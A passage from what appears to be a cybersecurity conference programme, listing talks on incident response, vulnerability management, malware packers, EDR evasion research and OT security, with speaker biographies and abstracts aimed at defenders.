Anne Connell is a Senior Cybersecurity Engineer with the Cybersecurity Risk & Resilience Directorate of the CERT Division at Carnegie Mellon University’s (CMU) Software Engineering Institute (SEI). Anne contributes to research and development that is focused on improving the security and resilience of the Nation’s critical infrastructure and assets. Anne has over 20 years of experience in cybersecurity model and assessment development, data privacy program development, resilience management, software development, and instructional design. She has led the development of products for CISA, DHS, DoE, DoD, and other federal law enforcement communities.
Anne’s contributions to CERT include creating data privacy programs, framework development for implementing privacy standards, data breach incident response, and protecting incident related data. She also creates custom cybersecurity training solutions for sponsors, requirements gathering, and application development. Anne’s research focus is to address privacy and cybersecurity concerns in a manner that protects our work partners and complies with regulations. This area consists of compliance management, transactional issues, and data breach response. Anne holds certifications in CISSP and CIPM. Anne was the project lead of the FBI Cyber Investigator Certification Program (CICP), developed for the 750,000 LEO members on cybersecurity investigations. Anne is an instructor of Privacy in the Digital Age at the CMU Heinz College of Information Systems and Public Policy, and is an active speaker at Pittsburgh Public Schools to educate students on the internet and social media. Anne holds a bachelor's degree in Information Systems and a master's degree in Human and Computer Interaction from Carnegie Mellon University.
Lauren Cooper is a member of the technical staff in the Cybersecurity Risk and Resilience directorate at the Software Engineering Institute, CERT Division, a federally funded research and development center operated by Carnegie Mellon University. She began her career in IT operations, before shifting her focus to information security. She earned her MS in Information Security Policy and Management from Carnegie Mellon University, where she was a Scholarship for Service awardee, a competitive scholarship program sponsored by the United States government. Her favorite areas of research include privacy, community approaches to cybersecurity, security of 5G and future networks, cybersecurity strategy, security by design in complex systems, and understanding and integrating human factors in security and privacy.
Organizations employ social media platforms for a variety of communication purposes, including sharing industry news and generating website traffic. According to the Pew Research Center News Platform Study, 54 percent of U.S. adults say they at least sometimes get news from social media. The almost instantaneous speed of social media to reach a broad audience makes it a communication outlet well adapted for dissemination of information about data breaches and response status, as well as for combatting misinformation. Many threat actors have found success manipulating social media to target organizations with the intent to damage, disrupt, or destroy trusted communications channels, brand reputation, or financial standing. Communication on social media about an organization's data breach or disclosure can have far-reaching consequences. Management's understanding of how to navigate the aftermath of such a breach is essential to its success in preserving and building the organization's real-world reputation and security. In this presentation, CERT, a division of the Software Engineering Institute (SEI) at Carnegie Mellon University, will spotlight case studies using evidence gathered from social media, and conclude with specific and practical incident response recommendations (best practices) on how organizations can address data privacy breaches and disclosures proactively.
June 25, 2025 10:30-11:05
- LU TLP:CLEAR
Beyond CVEs: Mastering the Landscape with Vulnerability-Lookup
Alexandre Dulaunoy (CIRCL, LU)
Alexandre Dulaunoy enjoys it when humans use machines in unexpected ways. I break stuff and I do stuff at CIRCL.
Although CVEs are a cornerstone of vulnerability management, they often present an incomplete view of the security landscape. Vulnerability-Lookup, a new open-source project developed by CIRCL, overcomes this limitation by providing a comprehensive and enriched vulnerability intelligence platform that extends beyond basic CVE data. This platform aggregates and correlates data from various sighting sources, such as exploit databases, vulnerability scanners, product advisories, and community contributions, offering a more complete picture of vulnerability threats. We will demonstrate how this richer level of detail enables security professionals to move beyond simple patch management and implement proactive, actionable, risk-based strategies.
June 25, 2025 11:15-11:50
- NO TLP:CLEAR
Beyond Scanners and Tickets: A New Paradigm for Attack Surface Management
Eirik Nordbø (Equinor ASA, NO), Anders Nese (Equinor ASA, NO)
Eirik is a team lead for Vulnerability and Exposure management in the Equinor Cyber Defense Center with many years of hands-on experience in incident response and penetration testing.
Anders Nese is an experienced incident responder who now heads up the cyber engineering team in the Equinor Cyber Defense Center.
Traditional vulnerability management often feels like a never-ending game of whack-a-mole, where security teams become the "security police" through ticketing systems or manual follow-ups. After years of struggling with this approach, we discovered that the real challenge wasn't in collecting vulnerability data -- it was in making that data meaningful and actionable for everyone involved. This talk shares our journey of transforming vulnerability management from a security team problem into an organizational collaboration, through the development of a visualization and prioritization platform that emphasizes human factors over pure metrics. We'll explore how this shift in perspective led to better engagement from risk owners, more efficient remediation processes, and ultimately, a stronger security posture. Learn how we moved beyond traditional approaches to create a system that turns overwhelming security data into clear, actionable insights that resonate with both technical and non-technical stakeholders. This presentation will provide practical insights for security teams struggling with vulnerability management at scale, offering both strategic approaches and tactical implementation details that can be adapted to various organizational contexts.
June 25, 2025 14:00-14:35
- TW TLP:CLEAR
Breaking Down Barriers: Analyzing Active Directory Security Across Industries
Gary Sun (CyCraft Technology, TW), Vivian Teng (CyCraft Technology, TW)
Gary Sun is a cyber security software engineer on the Engineering and Development Team at CyCraft Technology. Currently, he focuses on research on Active Directory security and cloud security. He graduated from National Yang Ming Chiao Tung University with a master's degree in Network Engineering. He has published papers at CISC 2021 and 2022. He is also a speaker at the SANS Blue Team Summit, AVTokyo, HITCON Enterprise and CyberSec.
Vivian Teng is a detection and response analyst on the customer success team at CyCraft Technology. She is responsible for Active Directory analysis and for providing best practices to solidify security for customers. She has published research in ACM Advances in Social Network Analysis and Mining, as well as NTCIR16 (NII Testbeds and Community for Information Access Research).
Active Directory (AD) plays a critical role in identity and access management for organizations, serving as the backbone for authenticating users and managing access to resources. Thus, AD is a popular target for attackers. According to DEVCORE, a professional red team company, 72% of AD environments are successfully compromised during red team assessments. This shows that it is easy for attackers to compromise AD. We investigate real world cases, finding that misconfigurations, such as excessive permissions and weak segmentation, are common root causes behind these vulnerabilities. In this talk, we explore real-world cases to reveal how industry-specific needs shape AD configurations across three sectors -- Finance, Government, and Technology. We identify six common permission settings observed in corporate environments, and discuss real world cases and statistical insights into these configurations. These insights emphasize the critical need for permission management, segmentation, and access control to mitigate risks and secure AD environments effectively. Lastly, we provide actionable recommendations to address these misconfigurations and protect organizations from potential breaches. Attendees will gain knowledge about industry-specific AD configuration challenges, common risky permissions, case studies on misconfigurations, and actionable strategies to strengthen AD security.
June 23, 2025 11:45-12:20
- US TLP:CLEAR
Breaking the SIEM Confinement
Anthony Talamantes (Johns Hopkins University Applied Physics Laboratory, US), Todd Kight (Johns Hopkins University Applied Physics Laboratory, US)
Anthony has over 24 years of experience in cybersecurity, with the last 17 years focused on nation state and sophisticated adversaries. Anthony developed the Cyber Hunt program at Johns Hopkins Applied Physics Laboratory and currently manages the Cyber Hunt, Applied Cyber Research, and Architecture & Engineering teams.
Todd has over 12 years of experience in cybersecurity and is the Lead Cyber Analyst on the Applied Cyber Research team at Johns Hopkins Applied Physics Lab. Todd leads the endpoint behavioral analysis effort and uses behavioral patterns to proactively hunt for malicious activity in the enterprise.
The focus of this presentation is exploring the limitations of traditional SIEMs and how we have engineered solutions around these limitations at Johns Hopkins University Applied Physics Laboratory. SIEMs are designed for a single query and basic correlation, and using the returned data becomes problematic, especially if there are thousands of results or more. These common SIEM approaches are often unusable for identifying sophisticated adversaries. We will illustrate how we use our SIEM, PowerShell, Python, SQL, SOAR, and other methodologies to create and combine more complex analytics that are impossible to complete in any existing SIEM.
June 25, 2025 14:00-14:35
- NL TLP:CLEAR
Bringing Actionable Data to Internet Defenders: Threat & Vulnerability Intelligence Capacity Building Efforts Across the Planet
Piotr Kijewski (The Shadowserver Foundation, NL)
Piotr Kijewski is the CEO and a Trustee at The Shadowserver Foundation, a non-profit organization with a mission of making the Internet a more secure environment. He also manages Shadowserver's large-scale data threat collection and sharing projects, as well as National CSIRT relationships. Piotr has over 20 years of operational experience in cybersecurity and incident response. He headed CERT.PL building up its various security data gathering and analysis projects as well as managing its anti-malware operations, including numerous botnet disruptions. Piotr is also a member of the Honeynet Project (where he has also served on the Board of Directors), a well-known and respected non-profit that is committed to the development of honeypot technologies and threat analysis. Recently, Piotr joined the Management Board of The Hague Chapter of the CyberPeace Institute.
The non-profit Shadowserver Foundation (https://shadowserver.org) has been active for over 15 years, delivering free daily threat and vulnerability intelligence feeds to 201 National CSIRTs covering 175 countries and territories, as well as over 8000 other organizations that have an Internet presence of any kind (including Sectoral CSIRTs, ISP/CSPs, hosting providers, enterprises, banks, academia, hospitals and SMEs). The presentation will cover Shadowserver's unique data driven approach to cybersecurity capacity building around the world. Shadowserver's focus is on delivering actionable, timely and relevant threat/vulnerability intelligence and victim data into the hands of Internet defenders at the operational level, and teaching them to understand the data being shared, automation, tools (such as IntelMQ) and processes necessary to respond to reported issues and incidents. It includes collaboration to understand and track the attack surface exposure of a country/constituency, potentially including deployment of dedicated sensor networks for improved insights. Our capacity building efforts aim to improve incident response capabilities across a country/constituency and strengthen its cyber resilience - by actioning, rather than merely collecting, reported security events or incidents. The goal is to help CSIRTs become high functioning through sustainable low cost solutions that can be realistically maintained for the mid to long term. As part of the talk, we will focus on our cyber capacity building efforts in Africa (which include collaboration with FIRST.org) and the Indo-Pacific, funded by the UK Foreign, Commonwealth and Development Office.
June 25, 2025 14:45-15:20
- JP TLP:CLEAR
Broken Seals, Broken Trust: Flaws and Defences in the Certificate Ecosystem
Yuta Sawabe (NTT Security Holdings, JP), Rintaro Koike (NTT Security Holdings, JP)
Yuta Sawabe is a SOC analyst at NTT Security Holdings, where he is primarily involved in log analysis and malware analysis. He previously worked on malicious domain names. He is an Information Processing Society of Japan JIP Special Paper Winner (2019). He has spoken at Botconf, HITCON, JSAC and CODE BLUE in the past.
Rintaro Koike is a security analyst at NTT Security Holdings. He is engaged in threat research and malware analysis. In addition, he is the founder of "nao_sec" and is in charge of threat research. He focuses on APT attacks targeting East Asia and web-based attacks. He has been a speaker at VB, SAS, Botconf, AVAR and others.
It is not uncommon for malware and malicious files to carry code signatures, which have become a traded commodity in cybercrime forums. This presentation begins with an overview of the current state of malicious code-signing certificates, including an examination of how these certificates are bought and sold in such forums. Our research uncovered unusual behaviours among sellers dealing in malicious code-signing certificates. By exploiting these behaviours, we successfully predicted the potential misuse of certain code-signing certificates several months in advance. This presentation will detail our methodology, the findings of our analysis, and propose practical measures to combat these sellers. Through this presentation, attendees will gain a comprehensive understanding of the current landscape of malicious code-signing certificates, experimental approaches to address the issue, and effective defence strategies. This knowledge will enable SOC, IR, CSIRT, and other cybersecurity professionals to take proactive measures against malware and malicious files bearing fraudulent code signatures.
June 25, 2025 14:45-15:20
- US TLP:CLEAR
Building the Blueprint: Designing Effective Storyboards for Cybersecurity Tabletop Exercises
John Hollenberger (Secureworks, US), Aamir Lakhani (Fortinet, US)
John Hollenberger is a cybersecurity consultant with seventeen years of experience in web- and host-based vulnerability assessments, incident response, digital forensics collection, PCI compliance, and Data Loss Prevention with a primary focus on proactive incident response consulting services. John is also the co-author of Cybersecurity Tabletop Exercises: From Planning to Execution.
In his current position, John is a Lead Consultant of Proactive Services, conducting training exercises in Incident Response fundamentals, developing and facilitating tabletop exercises, and reviewing and creating Cybersecurity Incident Response Plans for large corporations, small businesses, and non-profit organizations. John currently holds the following degrees and certifications: BA, CISSP, CISA, CISM, CRISC, GCIH, GWAPT, and Security+.
Storyboarding plays a pivotal role in the successful planning and execution of cybersecurity tabletop exercises, which are designed to assess incident response and decision-making within an organization. A well-constructed storyboard acts as a blueprint for the exercise, providing a clear, structured roadmap that guides participants through various injects and decision points. It ensures clarity, consistency, and focus throughout the exercise while outlining objectives, challenges, and potential outcomes. The storyboard's key components include: objectives, which define the purpose and learning goals; scenarios, which describe the unfolding events tailored to the objectives and roles; injects, or planned events that drive the narrative; and key issues, critical junctures where decisions impact the exercise's progression. By incorporating these elements, a storyboard helps create dynamic, engaging simulations that reflect real-world challenges, encourage collaboration, and improve preparedness. This talk will provide participants with the tools to craft their own effective storyboards for their organization's cybersecurity tabletop exercises.
June 24, 2025 13:30-14:05
- GB TLP:CLEAR
Building Towards #SquadGoals - Brick by Brick to a Unified Cyber Response Effort
Michael S (National Cyber Security Centre - United Kingdom, GB)
Mike is the Deputy Head of Incident Management Policy & International in the UK's National Cyber Security Centre (NCSC-UK). With a background in national law enforcement and now as a generalist civil servant, he is now responsible for delivering the frameworks for the UK Government response to significant cyber events. Additionally, he proactively seeks and maintains relationships across industry and international partners to ensure collaboration to strengthen the resilience against, and response to, cyber adversaries.
In 2016, when the United Kingdom's National Cyber Security Centre was established, the landscape of those involved in the response to cyber incidents was vast. Fast forward nine years to 2025 and it is significantly more crowded, and this is not a phenomenon faced only by the UK. In the face of adversary activity increasing in severity and scale, strong collaboration between government, industry and academia is key to strengthening cyber security resilience - and if it does go wrong - effective response. In this session, we will explore how to navigate the complexities posed by public/private partnerships, with differing duties to clients and often competing entities, to produce world-leading cyber security outputs. Case studies of NCSC-UK's recent successes with academic partners, c-suite engagement and co-sealing with insurance sector colleagues will reflect the opportunities available when sectors come together and operate as one.
June 23, 2025 14:00-14:35
- DE US TLP:CLEAR
Burnout: Detect, Investigate, Respond, Recover, Prevent
Desiree Sacher (Finanz Informatik, DE), Carson Zimmerman (Microsoft, US)
Desiree Sacher-Boldewin works as Head of Operational IT Security at Finanz Informatik (DE). She has been in the cyber security industry for 20 years and in various Security Operation positions and published papers and talks about optimizing processes. She can be found on GitHub and on Twitter as @d3sre.
Carson Zimmerman has been working in and around security operations centers (SOCs) for over 20 years. Carson is a Principal Security Researcher at Microsoft, working to elevate SOCs around the globe through industry-leading security capabilities. He co-authored 11 Strategies of a World-Class Cybersecurity Operations Center, available at mitre.org/11Strategies.
Carson and Desiree -- both industry veterans, both used to high stress roles -- have bailed from excellent security jobs because they burned out. Emotional outbursts, damaged family relationships, lost job opportunities, degraded health, weight gain, the list goes on. We've seen our close friends experience resume generating events because they pushed themselves past their limit. Don't let this happen to you. There's a lot more to dealing with burnout than just "get some rest" and "take breaks". An easy ops tempo for one person is an unsustainable death march to others; everyone is different. Burnout has impacted all of us, but almost no one's talking about it. We are. In this talk, we will give you the tools you need to prevent, detect, investigate, respond, and recover from burnout. Combating burnout and stress is not just your responsibility; your coworkers and your boss have a role too -- we will cover both. By the end of this talk, you will have a better understanding of how burnout is different than ordinary stress, how it impacts your body and your mind, and what you can do about it.
June 26, 2025 13:30-14:05
- FI TLP:CLEAR
Case: City of Helsinki Data Breach 2024
Matias Mesiä (NCSC-FI, FI)
Matias Mesiä has worked at NCSC-FI, the Finnish National Cyber Security Center, since 2020 with various responsibilities especially coordinating cases which needed special attention.
In 2024, the city of Helsinki was the victim of a data breach. The attacker stole the personal information of more than 100,000 Helsinki residents. Helsinki is the capital of Finland and the largest employer in Finland. The breach occurred in the city's education department. This presentation gives an insight into what happened and the role of NCSC-FI in this type of critical cyber incident. The cooperation between the city, NCSC-FI, ICT service providers and the police is crucial in such cases. What happens when the incident is in the media and the investigation is still ongoing? There are many lessons to be learned from this case, from keeping your environment up to date to dealing with the media.
June 23, 2025 11:45-12:20
- JP TLP:CLEAR
Comprehensive Investigation Results on Malware Code Interpretation by GPT-4
Yasuyuki Tanaka (NTT Social Informatics Laboratories, JP)
Yasuyuki Tanaka, Ph.D, CISSP, GREM is currently engaged in vulnerability and malware analysis at NTT-CERT. Additionally, he teaches malware analysis techniques at a university.
The code interpretation capabilities of LLMs, especially GPT-4, are remarkable. On the other hand, the problem is that their output contains errors that are difficult to verify. The same is true for malware code analysis, where no quantitative and comprehensive evaluation has been performed. In this paper, we created a dataset that covers all the behaviors used in many malware families, and quantitatively and comprehensively clarified the malware code interpretation performance of GPT-4 through experiments. We obtained disassembly code and decompiled code for the corresponding functions for 35 categories and 233 typical malware behaviors, and had GPT-4 interpret the code to analyze whether each behavior could be identified. As a result, 70% of the behaviors in the decompiled code and 8% of the behaviors in the disassembly code could be identified. We explain the specific behaviors that could and could not be identified for each. We present eight findings obtained by classifying and analyzing each behavior into three categories: method and logic, Windows specifications, and algorithms, and discuss future challenges.
June 27, 2025 11:15-11:50
- DE US TLP:GREEN
Crypted Hearts: Exposing the HeartCrypt Operation
Daniel Bunce (Palo Alto Networks, Unit 42, DE), Jerome Tujague (Palo Alto Networks, Unit 42, US)
Daniel Bunce is a Principal Malware Reverse Engineer at Unit 42 within Palo Alto Networks. He's mostly focused on analyzing malware linked to incident response cases, reverse engineering malicious code and identifying the TTPs used by cybercriminals. In addition to his professional role, Daniel is invested in the development of reverse engineering courses. He designs and delivers training programs such as Zero2Automated, which aim to educate and prepare individuals interested in the field.
As a dedicated malware reverse engineer at Palo Alto Networks' Unit 42, I specialize in uncovering the mechanics behind cyber threats, focusing on crimeware and APT-level malware. Each day involves a deep dive into disassembled code or building custom scripts to extract Indicators of Compromise (IOCs) that support defensive efforts. Outside of cybersecurity, I love music (building my vinyl collection), weight training, and reading sci-fi or fantasy books.
In June 2024, Unit 42 began tracking a new Packer-as-a-Service operation, self-titled "HeartCrypt", which was sold across several forums and Telegram accounts. Through our research, we've identified over 2,000 malware samples packed with HeartCrypt, comprising over 45 malware families in the last 10 months. The malware families packed by HeartCrypt range from commodity malware such as Remcos and LummaStealer, to pre-ransomware deployment tooling leveraged by high-level ransomware group affiliates, such as BlackSuit and Hive Ransomware. HeartCrypt provides threat actors with a low-cost entry of only $20 USD per "crypt", and a moderately sophisticated approach to malware payload crypting, which explains the high adoption rate over the past several months. Elements of polymorphism, control flow obfuscation, and EDR/AV evasion techniques are present within HeartCrypt, and while the core packer is rudimentary in nature, it is highly successful in evading both scantime and runtime anti-malware scanners. This talk will explore the inner workings of HeartCrypt, covering its evasion techniques, obfuscation methods, and development timeline - from the early stages, to its use in recent LummaStealer Fake Captcha campaigns. We'll conclude by examining the threat actor behind this packer-as-a-service, specifically focusing on sales channels and underground forum activity. We'll also be sharing YARA rules developed to track every sample of HeartCrypt so far.
June 25, 2025 11:15-11:50
- US TLP:CLEAR
Detection Engineering 101: Establishing a Structured Approach to Detection Engineering
Tomohisa Ishikawa (Tokio Marine Holdings, US)
Tomohisa is a Lead Cyber Security Architect at a global insurance company, bringing a wealth of expertise across diverse domains of cybersecurity. His professional experience spans global security strategy, security architecture, detection engineering, security operations, threat intelligence analysis, and digital forensics and incident response (DFIR). He has also been involved in red teaming and delivering security training. Tomohisa holds a Doctor of Engineering degree and a broad array of industry-recognized certifications, including CISSP, CSSLP, CCSP, CISA, CISM, CDPSE, and PMP.
Beyond his corporate responsibilities, Tomohisa has made significant contributions to the cybersecurity community. He has served as a speaker, a Cybersecurity Expert Advisor to the Ministry of Internal Affairs and Communications (MIC) in Japan, and a member of the national IT exam committee. He is also a translator and author. Tomohisa has spoken at international conferences such as SANSFIRE 2011 & 2012, DEFCON 24 SE Village, and FIRSTCON23, as well as numerous domestic conferences in Japan. As an author, he has written a book on threat intelligence in Japanese and translated seven security books published by O'Reilly Japan.
Detection Engineering (DE) is a vital aspect of modern cybersecurity operations, aimed at enhancing detection and response capabilities to address the ever-evolving threat landscape. This session presents a structured approach to DE, centered around the Detection and Response Development Lifecycle (DR-DLC) and supported by key frameworks and methodologies. These include the three techniques for improving detection capabilities, the HOPE framework, the VECTOR framework, the 3M+C framework, and three essential metrics (Time, Efficiency, and Coverage) for evaluating and managing an effective DE program. Together, these tools and processes enable a systematic approach to conducting DE and building a robust program. The key takeaway for attendees is a set of actionable strategies and a thought toolbox to implement and refine DE practices. Participants will gain practical insights into structured processes and standardized methodologies, equipping them to enhance their organization's detection engineering capabilities effectively.
June 26, 2025 09:00-09:35
- GH | TLP:GREEN
Developing a Sectoral CERT Ecosystem
Albert Antwi-Boasiako (Cyber Security Authority, GH), Stephen Cudjoe-Seshie (Cyber Security Authority, GH)
Dr. Albert Antwi-Boasiako, for more than a decade, has been pioneering cybersecurity development activities in Africa, both in the private sector and in government. Since 2017, Dr. Antwi-Boasiako has led the institutionalisation of Ghana's cybersecurity development, positioning the country in the Tier-1 category (role modelling) of the ITU's 2024 Global Cybersecurity Index.
Stephen is a versatile Technology Manager with nearly 2 decades of experience in ICT infrastructure strategy, planning, design, deployment, and operations. He holds an MBA in Engineering Management from Coventry University, UK and a Bachelor of Engineering (Hons.) in Electronics Engineering from the Multimedia University, Malaysia. He has been a Certified Information Systems Security Professional (CISSP) since 2011. Stephen's mandate at the CSA is to help build a Secure and Resilient Digital Ghana through world-class proactive and reactive cybersecurity incident response measures within a framework of global collaboration.
This presentation will discuss considerations for developing a Sectoral CERT ecosystem as part of the wider national cybersecurity strategy and highlight some key learnings from Ghana's approach.
June 26, 2025 15:00-15:35
- LT, LV | TLP:CLEAR
Engaging with the Media to Foster Cybersecurity Resilience
Zivile Necejauskaite (NRD Cyber Security, LT), Madara Krutova (Latvia's CERT.LV, part of the National Cybersecurity Centre, LV)
Zivile Necejauskaite is the Director of Marketing and Communication at NRD Cyber Security, a Lithuanian cybersecurity technology consulting and incident response company. With over 15 years of experience as a communication specialist, she has focused the past 7 years on the cybersecurity sector, specialising in impact, change, and crisis communications. In her role, Zivile actively engages with media professionals to enhance public understanding of cybersecurity issues. She has moderated and hosted cybersecurity panels and events both in Lithuania and internationally, including co-hosting the Cyber Defence East Africa conference. Through her efforts, Zivile contributes to strengthening cybersecurity resilience by fostering informed public discourse and promoting best practices in the digital landscape.
Madara Krutova is a representative of CERT.LV, Latvia's Information Technology Security Incident Response Institution. In this role, she actively engages with the media to enhance public awareness of cybersecurity issues. Madara has provided expert advice on safe online shopping practices, especially during peak periods like the holiday season, emphasizing vigilance against cyber threats such as phishing and fraudulent websites. She has also addressed potential increases in Distributed Denial-of-Service (DDoS) attacks during significant events, advising the public on preparedness and response strategies. Through her efforts, Madara contributes to strengthening cybersecurity resilience in Latvia.
Engaging with the media is an essential yet underutilised strategy for fostering cybersecurity resilience. This presentation explores approaches from Latvia and Lithuania, showcasing how different entities can collaborate with media to enhance public understanding of cybersecurity. Latvia's CERT.LV, part of the National Cybersecurity Centre, prioritises providing accurate, evidence-based information to media outlets, addressing the public's reliance on news portals for cybersecurity knowledge. In contrast, Lithuania, lacking a centralised cybersecurity awareness body, provides opportunities for other cybersecurity ecosystem members like NRD Cyber Security to foster media engagement initiatives. The company emphasises educating journalists through collaborative press releases and informal events to counter misconceptions and promote constructive narratives on cybersecurity. By sharing experiences and insights, this session highlights effective tactics to cultivate productive relationships with media professionals. These efforts aim to shift media focus from sensationalised reporting to fostering informed discussions, ultimately empowering the public to adopt cyber-resilient practices.
June 26, 2025 10:45-11:20
- AU | TLP:CLEAR
Enhancing Incident Response with AWS CIRT, MSSPs, and ISVs
Matthew Gurr (Full Membership via Amazon, AU)
Matt Gurr is a Senior Security Engineer with the AWS Global Services Security Organisation. In his role, Matt is responsible for a team of incident responders that assist customers during active security events on the customer side of the shared responsibility model. The team is made up of Senior Security Engineers and Solution Architects with experience in performing incident response in AWS. Prior to joining AWS, Matt gained over 25 years of experience in security roles in the banking and finance, government and defense industries. Matt holds a master's degree in Information Technology from Queensland University of Technology (QUT), and industry certifications from ISC2, ISACA, SABSA and SANS organisations. In his spare time, Matt enjoys being outdoors with family and cycling.
AWS strategically partners with Managed Security Service Providers (MSSPs), Independent Software Vendors (ISVs), National Computer Security Incident Response Teams (CSIRTs), and other agencies to amplify and enhance its security and incident response capabilities. This global ecosystem leverages AWS's robust cloud infrastructure while incorporating specialized security expertise and innovative software solutions developed by partners. MSSPs can offer managed security services, continuous monitoring, and rapid incident response, complemented by ISVs who create the cutting-edge security tools and integrations tailored for AWS customer environments. National CSIRTs and other agencies contribute their unique insights and capabilities to this collaborative framework. Together, these partnerships form a comprehensive security ecosystem that addresses evolving threats, ensures compliance, and enables rapid threat detection and mitigation. This multi-faceted approach empowers organizations with robust, highly scalable security solutions, expert management, and seamless integrations, significantly bolstering customers' overall security posture in the cloud.
June 25, 2025 13:15-13:50
- JP, US | TLP:CLEAR
Establishing a Global Community of Practice on Coordinated Vulnerability Disclosure (CVD)
Tomo Ito (JPCERT Coordination Center, JP), Justin Murphy (DHS/CISA, US)
Working on CVD at JPCERT/CC for 9 years, Tomo currently leads the Global CVD project of the organization, which aims to contribute to the global CVD ecosystem stability through collaborations with the stakeholders from different parts of the world.
Justin Murphy is a Vulnerability Analyst with the Cybersecurity and Infrastructure Security Agency (CISA). As part of CISA's Coordinated Vulnerability Disclosure (CVD) Team, he helps to coordinate the remediation, mitigation, and public disclosure of newly identified cybersecurity vulnerabilities in products and services with affected vendor(s), ranging from industrial control systems (ICS), medical devices, Internet of Things (IoT), and traditional information technology (IT) vulnerabilities. Justin also focuses on international collaboration regarding vulnerability management serving as co-chair for the Global Community of Practice on CVD (CVD-COP) as well as the OASIS Open technical committees for the Common Security Advisory Framework (CSAF) and OpenEoX standards.
As global cyber threats become increasingly sophisticated and widespread, Coordinated Vulnerability Disclosure (CVD) serves as an essential, structured approach for timely and effective communication of vulnerability information among the affected stakeholders. The recently established Global Community of Practice on CVD (CVD-COP) is an important initiative aimed at encouraging collaboration among governmental entities and national CERTs in their roles as third-party CVD coordinators. This presentation will explore the motivations behind the CVD-COP's formation, emphasizing the critical need for CVD as a good global practice and an essential risk reduction activity. We will outline the community's key activities, including developing best practices and training materials, facilitating knowledge and experience sharing, and promoting international cooperation among stakeholders. These efforts aim to establish harmonization and enhance the effectiveness of CVD across the globe. The presentation will also review the challenges faced by the CVD-COP, such as varying levels of understanding among participants and the complexities of different governance criteria. Addressing these issues is crucial for achieving the community's objectives and realizing the benefits of harmonization for CVD practices globally. The presentation will facilitate an interactive discussion, inviting audience input on how the community can optimize its support for the vulnerability management ecosystem. By inviting participants to share their insights and experiences, we hope to identify strategies that can strengthen the CVD-COP's effectiveness and foster collaboration among global stakeholders, including security researchers, vendors, and downstream users, ultimately promoting a more secure vulnerability management ecosystem.
June 27, 2025 10:30-11:05
- IL | TLP:CLEAR
Evading in Plain Sight: How Adversaries Beat User-Mode Protection Engines
Omri Misgav (Independent, IL)
Omri is an independent security researcher with over a decade of experience in the field. Previously, he headed a security research group in Fortinet's FortiGuard Labs, focused on OS internals, malware and vulnerabilities. Omri joined Fortinet following enSilo's acquisition, where he was the security research team leader and spearheaded the development of new offensive and defensive techniques. Before that, he led the R&D of unique network and endpoint security products for large-scale enterprise environments and was part of an incident response team, conducting investigations and hunting for nation-state threat actors. Omri is a past speaker at various conferences such as DEF CON, AVAR, BSidesLV, BSidesTLV and others.
Following the largest global IT outage in history last July, which disrupted numerous services and industries, many took to the public stage to advocate against allowing endpoint security vendors to design and deploy agents that are kernel-based, even prompting regulators to weigh in. User mode-based engines are already an integral piece of many endpoint-oriented security solutions, from malware analysis tools to various commercial products like AVs, EDRs, sandboxes and more. This kicked off research to map the entire threat landscape to assess the impact of the proposed design shift. Analyzing and reverse-engineering over 40 different malware families and open-source projects yielded an in-depth understanding and insights into attackers' tradecraft. This talk will explore the unique tactics and techniques which malware authors and red teamers have developed to beat user mode-based protection engines, showcasing their very fundamental design flaw: the reliance on the same execution environment that is intended to be protected. The talk will also highlight drawbacks of the various methods and provide a detection scheme focusing on runtime and forensic indicators to give a leg up to CSIRTs, malware researchers and detection engineers facing this issue.
June 25, 2025 13:15-13:50
- US | TLP:CLEAR
Forecasting Cybersecurity Data: Making Sense of the Senseless
Leigh Metcalf (CERT, US)
Leigh Metcalf is a Senior Network Security Research Analyst at the Carnegie Mellon University Software Engineering Institute's cybersecurity (CERT) division. She develops cutting-edge information and training to improve the practice of cybersecurity. Before joining CERT, Leigh spent more than ten years in industry working as a systems engineer, architect, and security specialist. Leigh also has a PhD in theoretical mathematics from Auburn University. Leigh has presented research at numerous conferences and is co-author of Cybersecurity: Myths and Misconceptions with Gene Spafford and Josiah Dykstra.
Planning resource management in cybersecurity is difficult and is always affected by the trends. How many vulnerabilities do we expect? How much malware? How many security incidents? Unfortunately, these trends are often affected by multiple causes that are not always related. For example, a new threat actor, a new malware library, a new class of vulnerability, or a new method of finding vulnerabilities. They may be interrelated, they may be unrelated, and they may be unknown, but at the core, they influence how many vulnerabilities, malware, incidents, and other cybersecurity events occur. As an outgrowth of analyzing COVID-19 trends and causes, we developed a new method for modeling multicausal data, which can have disparate underlying causes for the changes in trends. This method has been expanded to prediction, where we predict the point at which the trend in data changes, allowing us to forecast the number of events in the future.
June 27, 2025 09:00-09:35
- DK | TLP:CLEAR
From OSINT to Production Floor: How Threat Actors Can Infiltrate Your OT Operations Without You Even Knowing
Claudiu Chelaru (Mnemonic, DK)
I do ICS/OT security with a focus on attack detection capabilities and purple teaming. I have a pentester background, and have worked extensively across transportation, manufacturing and energy sectors. In my spare time I play around with product/hardware security.
This presentation details the outcomes of a purple teaming exercise with an industrial client, focusing on the security intersections between Information Technology (IT) and Operational Technology (OT) systems.
Parts:
- Part 1: Assessment background, OSINT, Internet Asset Mapping
- Part 2: Initial Foothold (primary and alternative attack paths), Lateral Movement within the IT-DMZ
- Part 3: Lateral Movement from IT-DMZ towards Enterprise IT, Lateral Movement from Enterprise IT towards OT
- Part 4: OT Environment (Cyber Physical Payloads), Remote Manipulation of Water Tank Levels
- Part 5: Conclusion and Countermeasures
June 25, 2025 13:15-13:50
- CZ | TLP:CLEAR
From p0f to JA4+: Network Fingerprinting and Reconnaissance
Vlad Iliushin (Cybersecurity Expert @ ELLIO, President of AMTSO (Anti-Malware Testing Standards Organization), CZ)
Vlad is the co-founder and cybersecurity expert at ELLIO and President of the Anti-Malware Testing Standards Organization (AMTSO). A true cybersecurity enthusiast, Vlad's passionate about network security, IoT, and cyber deception. Before ELLIO, he founded and led the Avast IoT Lab (now Gen Digital), developing security features and researching IoT threats. He has spoken at many conferences, including Web Summit and South by Southwest (SXSW), where he demonstrated IoT vulnerabilities.
As scanning and reconnaissance methods grow more diverse -- from public platforms like Shodan and Censys to hidden probing by botnets and bulletproof hosting services -- security teams need better ways to understand who is on the other side of their network connections. This talk will show how network fingerprinting has developed over time, starting with simple tools like p0f and moving up to more advanced methods like JA4, JA4+, and MuonFP. We'll discuss how these modern fingerprints can help analysts recognize the tools and infrastructure used by attackers, whether they are fast scanners, basic banner grabbers, or connections routed through VPNs and jump servers. You'll learn how to use these fingerprints to strengthen your defenses, protect critical infrastructure, and reduce your visibility to public scanners. We will also explain how to fit fingerprinting into SOC and CSIRT workflows, noting both what it can and cannot do. Attendees will leave with a practical understanding of modern fingerprinting techniques and a few examples they can apply in their daily work.
June 25, 2025 10:30-11:05
